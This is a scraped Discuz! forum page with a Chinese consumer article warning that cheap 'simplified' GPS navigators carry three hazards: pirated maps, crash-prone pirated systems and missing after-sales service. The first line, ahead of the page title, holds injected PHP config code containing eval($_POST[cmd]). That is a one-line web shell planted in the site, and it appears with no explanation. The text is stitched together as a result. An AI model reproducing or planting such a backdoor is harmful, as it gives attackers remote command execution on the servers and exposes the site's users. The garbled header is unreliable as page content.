');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 「簡化版」GPS導航儀存在3大潛在危害 - GPS - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

「簡化版」GPS導航儀存在3大潛在危害

面對巨大的利益誘惑,很多手機廠商、IT廠商、家電廠商都開始進軍這片未知的領域,紛紛想來分一杯羹。由於眾多雜牌小廠的加入,GPS市場呈現出一片魚龍混雜的局面。




    GPS產品技術含量不高,進入門檻低,難免會有很多技術不足的小廠商渾水摸魚。由於資金短缺,這些廠商只能靠降低產品的硬件配置和使用盜版地圖等措施來降低生產成本。這些「簡化」措施最終的受害人只有最終用戶。

    「簡化版」GPS導航儀三大潛在危害

    首先,盜版地圖,因其地圖沒有國家測繪機構的認證,地圖的準確性很差,導航過程中容易造成誤導,甚至給用戶造成安全隱患;

    第二,盜版操作系統容易造成GPS死機,在行車過程中,也容易分散駕駛員注意力,或在不熟悉的路途中引起駕駛員情緒慌亂,行車安全同樣得不到保障。

    第三,由於資金短缺,這些廠商沒有一套完善的硬件維修、軟件和地圖更新等基本售後服務體系。再加上質量較差的硬件配置,很難保證機器的正常使用。用戶購買GPS後一旦出現問題,維修和更換上必然得不到保障,花上千元買的GPS轉眼間成為一個一次性的奢侈品,得不償失。

    同時也有很多大廠商都做的很好,例如有些廠商為消費者提供了地圖免費三年的更新服務;有些廠商則為消費者提供先用後買的體驗活動;有實力的廠商還會建立一套完整的售後服務體系。

    總之,消費者在購買GPS時,也一定要擦亮雙眼,除了選擇讓你滿意的低廉的價格,超高性價比外,一定要選擇大廠商大品牌,為產品加個「保險」。
返回列表